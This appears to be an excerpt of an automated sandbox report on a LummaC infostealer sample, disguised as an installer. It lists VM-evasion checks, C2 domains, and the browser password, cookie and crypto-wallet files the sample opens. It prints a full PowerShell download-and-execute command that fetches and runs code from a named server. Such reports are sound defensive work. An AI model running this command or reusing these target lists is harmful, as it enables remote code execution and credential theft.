            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4662Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1715Jump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe TID: 7396Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep count: 4662 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep count: 1715 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1790726742.000000000083B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02980375 mov edx, dword ptr fs:[00000030h]0_2_02980375
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02980935 mov eax, dword ptr fs:[00000030h]0_2_02980935
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02980F84 mov eax, dword ptr fs:[00000030h]0_2_02980F84
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02980F85 mov eax, dword ptr fs:[00000030h]0_2_02980F85
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02980CE5 mov eax, dword ptr fs:[00000030h]0_2_02980CE5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: Set-UpFile_v25.exeString found in binary or memory: rabidcowse.shop
            Source: Set-UpFile_v25.exeString found in binary or memory: tirepublicerj.shop
            Source: Set-UpFile_v25.exeString found in binary or memory: noisycuttej.shop
            Source: Set-UpFile_v25.exeString found in binary or memory: cloudewahsj.shop
            Source: Set-UpFile_v25.exeString found in binary or memory: beattalkerz.cyou
            Source: Set-UpFile_v25.exeString found in binary or memory: wholersorie.shop
            Source: Set-UpFile_v25.exeString found in binary or memory: framekgirus.shop
            Source: Set-UpFile_v25.exeString found in binary or memory: nearycrepso.shop
            Source: Set-UpFile_v25.exeString found in binary or memory: abruptyopsn.shop
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; Jump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Set-UpFile_v25.exe, 00000000.00000003.1908751924.0000000000828000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1908751924.0000000000831000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000828000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1908751924.0000000000846000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000845000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: Set-UpFile_v25.exe PID: 7272, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/Electrum-LTCm F
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/ElectronCash6\H>
            Source: Set-UpFile_v25.exe, 00000000.00000003.1790726742.0000000000889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
            Source: Set-UpFile_v25.exe, 00000000.00000002.1962678644.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: Set-UpFile_v25.exe, 00000000.00000003.1908978246.0000000000893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\
            Source: Set-UpFile_v25.exe, 00000000.00000003.1908978246.0000000000893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkfgppdlbmlmnp
            Source: Set-UpFile_v25.exe, 00000000.00000003.1908978246.0000000000893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: locpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["k
            Source: powershell.exe, 00000004.00000002.1983244508.0000000007040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
